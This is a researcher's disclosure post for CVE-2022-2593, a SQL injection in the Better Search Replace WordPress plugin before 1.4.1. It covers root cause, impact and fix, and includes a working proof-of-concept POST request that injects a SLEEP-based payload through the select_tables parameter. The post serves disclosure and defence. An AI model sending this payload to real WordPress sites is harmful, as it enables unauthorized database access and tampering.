YouGina

Published: 2023-06-14

Since recently I am conducting a code audit on various popular WordPress plugins. During one of these assessments last year, I discovered a vulnerability in the Better Search Replace WordPress plugin. The vulnerability, assigned CVE-2022-2593, exposes the plugin to a SQL injection attack, which could potentially be exploited by high privilege users to execute arbitrary SQL statements. This article provides detailed information about the vulnerability and its impact, along with recommended actions to mitigate the risk.

The Better Search Replace WordPress plugin before version 1.4.1 is vulnerable to a SQL injection attack, which could be exploited by high privilege users to execute arbitrary SQL statements. The plugin fails to properly sanitize and escape table data before incorporating it into SQL queries, leading to the potential manipulation of database queries.

The vulnerability can be triggered by sending a crafted POST request to the better-search-replace endpoint. In the plugin's code, the select_tables parameter is not sufficiently sanitized, allowing an attacker to inject malicious SQL code into the query.

Proof of Concept

An attacker can exploit this vulnerability by sending a POST request to the following endpoint:

POST /wp-admin/tools.php?page=better-search-replace&bsr-ajax=process_search_replace HTTP/1.1
Host: [target_host]
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 369
Connection: close
Cookie:[admin+]

bsr_ajax_nonce=3c38e50368&action=process_search_replace&bsr_step=0&bsr_page=0&bsr_data=search_for%3Daaa%26replace_with%3Dcef%26select_tables%255B%255D%3Dwp_posts%60%20WHERE%201=SLEEP(1)%20--%20%26dry_run%3Don%26bsr_nonce%3Da66e81c52b%26_wp_http_referer%3D%252Fwordpress%252Fwp-admin%252Ftools.php%253Fpage%253Dbetter-search-replace%26action%3Dbsr_process_search_replace

In the above request a POST request is send to the the /wp-admin/tools.php?page=better-search-replace&bsr-ajax=process_search_replace endpoint. The body of the request consists of the following parameters:

• bsr_ajax_nonce: Nonce value for authentication.
• action: Specifies the action to be performed, which is process_search_replace.
• bsr_step and bsr_page: Parameters related to the search and replace process, these can both be set to a random numeric value for the exploit to work. In this case they are set to 0.
• bsr_data: The bsr_data contains a URL encoded string containing parameters specific for the plugin:
  • select_tables: This parameter is the actual parameter that injects the SQL payload. In this case, the payload attempts to execute a SQL injection by appending a malicious WHERE clause: wp_posts` WHERE 1=SLEEP(1) -- . The double hyphen "--" comments out the remaining part of the original SQL query.
  • dry_run: Specifies if the search and replace operation should be performed or simulated, either case is vulnerable.
  • bsr_nonce: Nonce value for request verification.
  • _wp_http_referer: Refers to the URL of the previous page.
  • action: Specifies the action again, which is bsr_process_search_replace.

The vulnerability arises from a flaw in the way the Better Search Replace plugin handles table names during SQL query construction. Although the plugin utilizes the sql_esc function provided by WordPress to sanitize most inputs, it fails to properly sanitize backticks when constructing SQL queries for table names. As a result, an attacker can bypass the sanitization mechanism and inject malicious SQL code to exploit this oversight.

Impact:

To exploit this SQL injection vulnerability the attacker is required to have access to an account with high privilege levels, such as an administrator account. Successful exploitation could allow the attacker to execute arbitrary SQL queries within the context of the WordPress database. This could lead to unauthorized access, data manipulation, or even a complete compromise of the server running the database.

Solution:

To address this vulnerability the maintainers of the plugin revised the code to ensure proper validation of table names before using them in SQL queries. They implemented a mechanism to check the validity of table names against the existing tables in the database, thereby preventing SQL injection attacks.

Affected Versions:

The SQL injection vulnerability exists in the Better Search Replace WordPress plugin versions prior to 1.4.1. It is advised that all users of this plugin upgrade to the latest version immediately to mitigate the risk associated with this vulnerability.

References:

• Better Search Replace Plugin: https://bettersearchreplace.com/
• CVE-2022-2593: https://nvd.nist.gov/vuln/detail/CVE-2022-2593
• WP-Scan: https://wpscan.com/vulnerability/229a065e-1062-44d4-818d-29aa3b6b6d41